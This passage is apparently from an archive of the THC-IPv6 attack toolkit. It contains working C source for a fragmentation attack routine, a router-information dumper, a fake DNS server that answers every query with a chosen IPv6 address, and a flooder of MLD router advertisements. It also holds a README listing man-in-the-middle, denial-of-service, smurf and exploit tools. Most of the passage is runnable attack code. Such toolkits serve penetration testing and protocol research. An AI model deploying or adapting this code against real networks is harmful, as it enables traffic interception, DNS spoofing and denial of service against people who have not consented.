thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); memset(buf, 'A', sizeof(buf)); if (flood == 0 || curr == 0) printf(" Sending fragments 2-46\n"); for (i = 0; i < 45; i++) { pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51 + i * 177, 1, 0xfacebabe + getpid() + count + curr)) return -1; if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 1416)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore } if (flood == 0 || curr == 0) printf(" Sending fragment %d (preparation fragment)\n", i + 2); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 51 + 45 * 177, 1, 0xfacebabe + getpid() + count + curr)) return -1; if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, (8190 - (51 + 45 * 177)))) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); if (flood == 0 || curr == 0) printf(" Sending final fragment with 8191 and sending 1414 bytes\n"); pkt3 = thc_destroy_packet(pkt3); hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, tos, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 8191, 0, 0xfacebabe + getpid() + count + curr)) return -1; if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 1414)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (!flood) sleep(1); curr++; } if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("Multifragment %d - Level 1\n", count); hdr = (thc_ipv6_hdr *) pkt; if (flood == 0 || curr == 0) printf(" 1: A-first + B-first\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; // if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 0, 0x3aaaa)) // return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0x3bbbb)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 200); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 200)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" 2: B\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 25, 1, 0x3bbbb)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 200, 200); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 200)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" 3: B\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 25*2, 1, 0x3bbbb)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 200 * 2, 200); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 200)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" 4: B-last\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 25*3, 1, 0x3bbbb)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 200 * 3, 608); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 608)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore curr++; } //tmp if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("Multifragment %d - Level 2\n", count); hdr = (thc_ipv6_hdr *) pkt; if (flood == 0 || curr == 0) printf(" 1: A-first + B-first\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0x1aaaa)) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0x1bbbb)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 200); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 200)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" 2: A-last (B)\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 25 + 1, 0, 0x1aaaa)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 200, 200); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 200)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" 3: B\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 25*2, 1, 0x1bbbb)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 200 * 2, 200); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 200)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" 4: B-last\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 25*3, 0, 0x1bbbb)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 200 * 3, 608); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 608)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore curr++; } //tmp if (only == ++count || only == 0) while (curr < resend || flood) { if (flood == 0 || curr == 0) printf("Multifragment %d - Level 3\n", count); hdr = (thc_ipv6_hdr *) pkt; if (flood == 0 || curr == 0) printf(" 1: A-first + B-first + C-first\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0x2aaaa)) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0x2bbbb)) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 0, 1, 0x2cccc)) return -1; memcpy(buf, hdr->pkt + 40 + offset, 200); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 200)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" 2: A-last (B/C)\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 25 + 2, 0, 0x2aaaa)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 200, 200); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 200)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" 3: B-last (C)\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 25*2 + 1, 0, 0x2bbbb)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 200 * 2, 200); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 200)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore if (flood == 0 || curr == 0) printf(" 4: C-last\n"); pkt3 = thc_destroy_packet(pkt3); if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt3, &pkt_len3, 25*3, 0, 0x2cccc)) return -1; memcpy(buf, hdr->pkt + 40 + offset + 200 * 3, 608); if (thc_add_data6(pkt3, &pkt_len3, NXT_ICMP6, buf, 608)) return -1; thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3); // ignore curr++; } if (flood == 0 || curr == 0) printf("ATTACK finalisation\n"); if (ping) { if (flood == 0 || curr == 0) printf(" Sending final ping to %s\n", argv[optind + 1]); thc_ping6(interface, src6, dst6, 10, 1); sleep(1); } if (flood == 0 || curr == 0) printf("ATTACK END\n"); return 0; } thc-ipv6-2.5/dump_router6.c0000644000000000000000000001550312251022435014315 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" #define MAX_SEEN 255 char *frbuf, *frbuf2, *frint, buf3[1504]; int frbuflen, frbuf2len, do_hop = 0, do_frag = 0, do_dst = 0, type = NXT_ICMP6, seen_cnt = 0; unsigned char *frip6, *frmac, *frdst; thc_ipv6_hdr *frhdr = NULL; char seen[MAX_SEEN + 1][16]; extern int do_hdr_size; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface [target]\n\n", prg); printf("Dumps all local routers and their information\n\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } void dump_ra_reply(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { unsigned char *ipv6hdr = (unsigned char *) (data + 14), *ptr, *ptr2; int i, k, len = header->caplen - 14; if (do_hdr_size > 0) { ipv6hdr = (unsigned char *) (data + do_hdr_size); len -= (do_hdr_size - 14); if ((ipv6hdr[0] & 240) != 0x60) return; } if (ipv6hdr[6] != NXT_ICMP6 || ipv6hdr[40] != ICMP6_ROUTERADV || len < 40 + 16) return; if (seen > 0) { for (i = 0; i < seen_cnt; i++) if (memcmp(seen[i], ipv6hdr + 8, 16) == 0) return; } if (seen_cnt <= MAX_SEEN) memcpy(seen[seen_cnt++], ipv6hdr + 8, 16); printf("Router: %s (MAC: %02x:%02x:%02x:%02x:%02x:%02x)\n", thc_ipv62notation(ipv6hdr + 8), data[6], data[7], data[8], data[9], data[10], data[11]); printf(" Priority: "); i = ipv6hdr[45] & 24; switch (i) { case 0: printf("medium\n"); break; case 8: printf("high\n"); break; case 16: printf("reserved value\n"); break; case 24: printf("low\n"); break; } printf(" Hop Count: %d\n", ipv6hdr[44]); printf(" Lifetime: %d, Reachable: %u, Retrans: %u\n", (ipv6hdr[46] << 8) + ipv6hdr[47], (ipv6hdr[48] << 24) + (ipv6hdr[49] << 16) + (ipv6hdr[50] << 8) + ipv6hdr[51], (ipv6hdr[52] << 24) + (ipv6hdr[53] << 16) + (ipv6hdr[54] << 8) + ipv6hdr[55]); printf(" Flags: "); if ((ipv6hdr[45] & 128) > 0) printf("managed "); else printf("NOTmanaged "); if ((ipv6hdr[45] & 64) > 0) printf("other "); else printf("NOTother "); if ((ipv6hdr[45] & 32) > 0) printf("home-agent "); else printf("NOThome-agent "); if ((ipv6hdr[45] & 4) > 0) printf("proxied "); else printf("NOTproxied "); if ((ipv6hdr[45] & 2) > 0) printf("RESERVED-2-BIT-SET "); if ((ipv6hdr[45] & 1) > 0) printf("RESERVED-1-BIT-SET"); printf("\n"); i = len - 56; ptr = ipv6hdr + 56; printf(" Options:\n"); while (i > 0) { if (i < 8 || ptr[1] * 8 > i || ptr[1] == 0) { printf("Packet truncated!\n\n"); return; } // (ptr[] << 24) + (ptr[] << 16) + (ptr[] << 8) + ptr[] switch (*ptr) { case 1: printf(" MAC: %02x:%02x:%02x:%02x:%02x:%02x\n", ptr[2], ptr[3], ptr[4], ptr[5], ptr[6], ptr[7]); break; case 3: if (ptr[1] != 4) printf(" Prefix: illegal\n"); else { printf(" Prefix: %s/%d (Valid: %u, Preferred: %u)\n", thc_ipv62notation(ptr + 16), ptr[2], (ptr[4] << 24) + (ptr[5] << 16) + (ptr[6] << 8) + ptr[7], (ptr[8] << 24) + (ptr[9] << 16) + (ptr[10] << 8) + ptr[11]); printf(" Flags:"); if ((ptr[3] & 128) > 0) printf(" On-Link"); else printf(" NOT-on-link"); if ((ptr[3] & 64) > 0) printf(" Autoconfig"); else printf(" NOT-autoconfig"); if ((ptr[3] & 63) > 0) printf(" RESERVED-BITS-SET-%d", ptr[3] & 63); printf("\n"); } break; case 5: printf(" MTU: %d\n", (ptr[4] << 24) + (ptr[5] << 16) + (ptr[6] << 8) + ptr[7]); break; case 24: if (ptr[1] != 3) printf(" Route: illegal\n"); else { printf(" Route: %s/%d (Lifetime: %u/%u)\n", thc_ipv62notation(ptr + 8), ptr[2], (ptr[4] << 24) + (ptr[5] << 16) + (ptr[6] << 8) + ptr[7], (ptr[8] << 24) + (ptr[9] << 16) + (ptr[10] << 8) + ptr[11]); printf(" Priority:"); k = ptr[3] & 24; switch (k) { case 0: printf("medium\n"); break; case 8: printf("high\n"); break; case 16: printf("reserved value\n"); break; case 24: printf("low\n"); break; } } break; case 31: ptr2 = ptr + 9; while (*ptr2 != 0) { if (*ptr2 < 32 && *ptr2 > 0) *ptr2 = '.'; ptr2++; } printf(" DNS Searchlist: %s (Lifetime: %u)\n", ptr + 9, (ptr[4] << 24) + (ptr[5] << 16) + (ptr[6] << 8) + ptr[7]); break; case 25: if (ptr[1] != 3) printf(" DNS: illegal\n"); else { printf(" DNS: %s (Lifetime: %u/%u)\n", thc_ipv62notation(ptr + 8), (ptr[4] << 24) + (ptr[5] << 16) + (ptr[6] << 8) + ptr[7], (ptr[8] << 24) + (ptr[9] << 16) + (ptr[10] << 8) + ptr[11]); } break; default: printf(" Unknown Option Type: %d (size: %d bytes)\n", ptr[0], ptr[1] * 8); } i -= ptr[1] * 8; ptr += ptr[1] * 8; } printf("\n"); } void clean_exit(int sig) { exit(0); } int main(int argc, char *argv[]) { char *interface, string[] = "ip6 and icmp6"; unsigned char *mac6, buf[512]; unsigned char *dst = thc_resolve6("ff02::2"); int i; unsigned char *pkt = NULL; int pkt_len = 0; int rawmode = 0; pcap_t *p; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "r")) >= 0) { switch (i) { case 'r': thc_ipv6_rawmode(1); rawmode = 1; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } interface = argv[optind]; if ((mac6 = thc_get_own_mac(interface)) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if (argc - optind > 1 && argv[optind + 1] != NULL) dst = thc_resolve6(argv[optind + 1]); memset(buf, 0, sizeof(buf)); buf[0] = 1; buf[1] = 1; memcpy(buf + 2, mac6, 6); i = 8; memset(seen, 0, sizeof(seen)); if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, NULL, dst, 255, 0, 0, 0xe0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERSOL, 0, 0, buf, i, 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0) return -1; signal(SIGALRM, clean_exit); alarm(5); while (1) { while (thc_pcap_check(p, (char *) dump_ra_reply, NULL) > 0); usleep(100); } return 0; } thc-ipv6-2.5/fake_dns6d.c0000644000000000000000000001475412251022435013675 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" char mybuf[1024], mybuf2[28], *interface, lookup[256]; int mlen, rawmode = 0; char *mac6, *ip6; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface ipv6-address [fake-ipv6-address [fake-mac]]\n", prg); printf("Fake DNS server that serves the same IPv6 address to any lookup request\n"); printf("You can use this together with parasite6 if clients have a fixed DNS server\n"); printf("Note: very simple server. Does not honor multiple queries in a packet, nor"); printf("NS, MX, etc. lookups.\n"); exit(-1); } void check_packets(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { unsigned char *ptr = (unsigned char *) data, *ptr2, *ptr3, *dst6, *src6, *dmac = NULL, *pkt, *look, *lwrite = lookup; unsigned short int sport, dport; int len = header->caplen, plen = mlen, pkt_len; if (!rawmode) { if (do_hdr_size) { len -= do_hdr_size; ptr += do_hdr_size; if ((ptr[0] & 240) != 0x60) return; // dmac is ignored anyway } else { dmac = ptr + 6; len -= 14; ptr += 14; } } if (len < 70 || len > 800 || ptr[50] >= 128) return; look = ptr + 61; mybuf[0] = ptr[48]; // copy txid mybuf[1] = ptr[49]; sport = ptr[42] * 256 + ptr[43]; dport = ptr[40] * 256 + ptr[41]; src6 = ptr + 24; dst6 = ptr + 8; memcpy(mybuf + plen, ptr + 60, len - 60); plen += (len - 60); memcpy(mybuf + plen, mybuf2, sizeof(mybuf2)); plen += sizeof(mybuf2); if (src6[0] == 0xff && src6[1] < 16) // if the original dst is not a multicast address src6 = ip6; // then use this as a spoofed source if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL) return; if (thc_add_udp(pkt, &pkt_len, sport, dport, 0, mybuf, plen) < 0) return; thc_generate_and_send_pkt(interface, mac6, dmac, pkt, &pkt_len); do { if (*look > 0 && *look < '0') *lwrite = '.'; else *lwrite = *look; look++; lwrite++; } while (*look != 0 && look <= ptr + len - 4 && look <= ptr + 255 + 60); *lwrite = 0; ptr2 = thc_ipv62notation(dst6); ptr3 = thc_ipv62notation(src6); printf("Spoofed %s to %s as source %s\n", lookup, ptr2, ptr3); free(ptr2); free(ptr3); } int main(int argc, char *argv[]) { char mac[16] = "", *routerip6, *ptr; pcap_t *p; /* char rdatabuf[1024], wdatabuf[1024], cmsgbuf[1024]; */ // int size, i, j, k, l, m, s, len, t, u, csize = 0; /* socklen_t fromlen; static struct iovec iov; struct sockaddr_storage from; struct msghdr mhdr; struct sockaddr_in6 ddst; unsigned long long int count = 0;*/ if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { // is ignored argv++; argc--; thc_ipv6_rawmode(1); rawmode = 1; } memset(mac, 0, sizeof(mac)); mac6 = mac; interface = argv[1]; if (argc >= 5 && (ptr = argv[4]) != NULL) sscanf(ptr, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4], (unsigned int *) &mac[5]); else mac6 = thc_get_own_mac(interface); if (argc >= 4 && argv[3] != NULL) ip6 = thc_resolve6(argv[3]); else ip6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK); if (mac6 == NULL || ip6 == NULL) { fprintf(stderr, "Error: invalid interface %s or invalid src mac/IP set\n", interface); exit(-1); } routerip6 = thc_resolve6(argv[2]); if (routerip6 == NULL) { fprintf(stderr, "Error: fake IPv6 answer option is invalid: %s\n", argv[2]); exit(-1); } if (ip6 == NULL) { fprintf(stderr, "Error: fake answer IPv6 argument is invalid: %s\n", argv[3]); exit(-1); } if (mac6 == NULL) { fprintf(stderr, "Error: mac address in invalid\n"); exit(-1); } if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and (dst port 53 or dst port 5353)")) == NULL) { fprintf(stderr, "Error: could not open interface %s in promisc mode\n", interface); exit(-1); } /* if ((s = thc_bind_udp_port(53)) < 0) { fprintf(stderr, "Warning: could not bind to 53/udp\n"); } else { thc_bind_multicast_to_socket(s, interface, thc_resolve6("ff02::1:3")); fcntl(s, F_SETFL, O_NONBLOCK); } if ((t = thc_bind_udp_port(5353)) < 0) { fprintf(stderr, "Error: could not bind to 5353/udp\n"); exit(-1); } else { thc_bind_multicast_to_socket(t, interface, thc_resolve6("ff02::1:3")); fcntl(t, F_SETFL, O_NONBLOCK); } if ((u = socket(AF_INET6, SOCK_DGRAM, 0)) < 0) { perror("Error:"); exit(-1); } */ memset(mybuf, 0, sizeof(mybuf)); mybuf[2] = 0x81; // flags mybuf[3] = 0x80; mybuf[5] = 1; // queries mybuf[7] = 1; // replies // no RRs, no add R mlen = 12; memset(mybuf2, 0, sizeof(mybuf2)); mybuf2[0] = 0xc0; // name mybuf2[1] = 0x0c; mybuf2[3] = 0x1c; // type aaaa mybuf2[5] = 0x01; // class IN mybuf2[8] = 0x04; // ttl (1024 seconds == 0x00000400) mybuf2[11] = 0x10; // length 16 memcpy(mybuf2 + 12, routerip6, 16); printf("Starting fake dns6 server on %s for %s (Press Control-C to end) ...\n\n", interface, argv[2]); while (1) thc_pcap_check(p, (char *) check_packets, NULL); /* while(1) { memset((char*)&from, 0, sizeof(from)); memset(&iov, 0, sizeof(iov)); memset(&mhdr, 0, sizeof(mhdr)); iov.iov_base = rdatabuf; iov.iov_len = sizeof(rdatabuf); mhdr.msg_name = &from; mhdr.msg_namelen = sizeof(from); mhdr.msg_iov = &iov; mhdr.msg_iovlen = 1; mhdr.msg_control = (caddr_t)cmsgbuf; mhdr.msg_controllen = sizeof(cmsgbuf); if ( (s >= 0 && (len = recvmsg(s, &mhdr, 0)) > 0) || (t >= 0 && (len = recvmsg(t, &mhdr, 0)) > 0)) { fromlen = mhdr.msg_namelen; if (debug) thc_dump_data(rdatabuf, len, "Received Packet"); ddst.sin6_addr = ((struct sockaddr_in6 *)mhdr.msg_name)->sin6_addr; ptr2 = thc_ipv62notation((char*)&ddst.sin6_addr); // data in rdatabuf, ipv6string in ptr2 // . // . } else usleep(200); } */ return 0; // never reached } thc-ipv6-2.5/flood_mldrouter6.c0000644000000000000000000000460612251022436015153 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface [target]\n\n", prg); printf("Flood the local network with MLD router advertisements.\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } int main(int argc, char *argv[]) { char *interface, mac[6] = ""; unsigned char *mac6 = mac, *ip6 = thc_resolve6("fe80::ff:fe00:0"); unsigned char buf[6]; unsigned char *dst = thc_resolve6("ff02::6a"), *dstmac = thc_get_multicast_mac(dst); int i; unsigned char *pkt = NULL; int pkt_len = 0; int rawmode = 0; int count = 0; if (argc < 2 || argc > 4 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } srand(time(NULL) + getpid()); setvbuf(stdout, NULL, _IONBF, 0); interface = argv[1]; if (thc_get_own_mac(interface) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if (argc > 2) if ((dst = thc_resolve6(argv[2])) == NULL) { fprintf(stderr, "Error: can not resolve %s\n", argv[2]); exit(-1); } memset(buf, 0, sizeof(buf)); mac[0] = 0x00; mac[1] = 0x18; ip6[9] = mac[1]; printf("Starting to flood network with MLD router advertisements on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface); while (1) { for (i = 0; i < 4; i++) mac[2 + i] = rand() % 256; // ip6[9] = mac[1]; ip6[10] = mac[2]; ip6[13] = mac[3]; ip6[14] = mac[4]; ip6[15] = mac[5]; count++; if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 1, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_MLD_ROUTERADV, 15, 0x00300006, buf, 0, 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) { // fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface); // perror(""); // return -1; printf("!"); } pkt = thc_destroy_packet(pkt); // usleep(1); if (count % 1000 == 0) printf("."); } return 0; } thc-ipv6-2.5/README0000644000000000000000000003143612256500740012406 0ustar rootroot THC-IPV6-ATTACK-TOOLKIT (c) 2005-2013 vh@thc.org www.thc.org Licensed under AGPLv3 (see LICENSE file) INTRODUCTION ============ This code was inspired when I got into touch with IPv6, learned more and more about it - and then found no tools to play (read: "hack") around with. First I tried to implement things with libnet, but then found out that the IPv6 implementation is only partial - and sucks. I tried to add the missing code, but well, it was not so easy, hence I saved my time and quickly wrote my own library. LIMITATIONS =========== This code currently only runs on: - Linux 2.6.x or newer (because of /proc usage) - Ethernet But this means for all linux guys that it will work for 98% of your use cases. Patches are welcome! (add "antispam" in the subject line to get through my anti-spam protection, otherwise the email will bounce) THE TOOLS ========= The THC IPV6 ATTACK TOOLKIT comes already with lots of effective attacking tools: - parasite6: ICMPv6 neighbor solitication/advertisement spoofer, puts you as man-in-the-middle, same as ARP mitm (and parasite) - alive6: an effective alive scanng, which will detect all systems listening to this address - dnsdict6: parallized DNS IPv6 dictionary bruteforcer - fake_router6: announce yourself as a router on the network, with the highest priority - redir6: redirect traffic to you intelligently (man-in-the-middle) with a clever ICMPv6 redirect spoofer - toobig6: mtu decreaser with the same intelligence as redir6 - detect-new-ip6: detect new IPv6 devices which join the network, you can run a script to automatically scan these systems etc. - dos-new-ip6: detect new IPv6 devices and tell them that their chosen IP collides on the network (DOS). - trace6: very fast traceroute6 with supports ICMP6 echo request and TCP-SYN - flood_router6: flood a target with random router advertisements - flood_advertise6: flood a target with random neighbor advertisements - fuzz_ip6: fuzzer for IPv6 - implementation6: performs various implementation checks on IPv6 - implementation6d: listen daemon for implementation6 to check behind a FW - fake_mld6: announce yourself in a multicast group of your choice on the net - fake_mld26: same but for MLDv2 - fake_mldrouter6: fake MLD router messages - fake_mipv6: steal a mobile IP to yours if IPSEC is not needed for authentication - fake_advertiser6: announce yourself on the network - smurf6: local smurfer - rsmurf6: remote smurfer, known to work only against linux at the moment - exploit6: known IPv6 vulnerabilities to test against a target - denial6: a collection of denial-of-service tests againsts a target - thcping6: sends a hand crafted ping6 packet - sendpees6: a tool by willdamn@gmail.com, which generates a neighbor solicitation requests with a lot of CGAs (crypto stuff ;-) to keep the CPU busy. nice. and about 25 more tools for you to discover :-) Just run the tools without options and they will give you help and show the command line options. THE LIBRARY =========== The library thc-ipv6-lib.c is the heart and soul of all tools - and those you may want to write. Implementation is so simple, its usually just 2-4 lines to create a complete IPv6/ICMPv6 packet with the content of your choice. Your basic structure you use is (thc_ipv6_hdr *) e.g. thc_ipv6_hdr *my_ipv6_packet; int my_ipv6_packet_len; and you will never have to play with its options/fields. Whenever you want to build an IPv6 packet, you just write: my_ipv6_packet = thc_create_ipv6_extended(interface, prefer, &my_ipv6_packet_len, src6, dst6, ttl, length, label, class, version); if something fails, it returns NULL (only if my_ipv6_packet_len or dst6 do not exist or malloc fails). The options to thc_create_ipv6_extended are: (char*) interface - the interface on which you want to send out the packet (int) prefer - either PREFER_LINK (to use the link local address) or PREFER_HOST to use a host IPv6 address, and PREFER_GLOBAL to use a public (internet) IP6 address (default) (int *) &my_ipv6_packet_len - the size of the packet which will be created (unsigned char*) src6 - the source IP6 (OPTIONAL - will be selected if NULL) (unsigned char*) dst6 - the destination IP6 (in network format, 16 bytes long) usually the result of thc_resolve6("ipv6.google.com"); (int) ttl - the ttl of the packet (OPTIONAL - 0 will set this to 255) (int) length - the length which will be set in the header (OPTIONAL - 0 = real length) (int) label - the flow label (0 is fine) (int) class - the class of the packet (0 is fine) (int) version - the IP6 version (OPTIONAL - 0 will set this to version 6) It returns NULL on errors or a malloc'ed structure on success. free() it once you are done with it. Now you can set extension headers on top of it: thc_add_hdr_route(my_ipv6_packet, &my_ipv6_packet_len, routers, routerptr); thc_add_hdr_fragment(my_ipv6_packet, &my_ipv6_packet_len, offset, more_frags, id); thc_add_hdr_dst(my_ipv6_packet, &my_ipv6_packet_len, buf, buflen); thc_add_hdr_hopbyhop(my_ipv6_packet, &my_ipv6_packet_len, buf, buflen); thc_add_hdr_nonxt(my_ipv6_packet, &my_ipv6_packet_len, 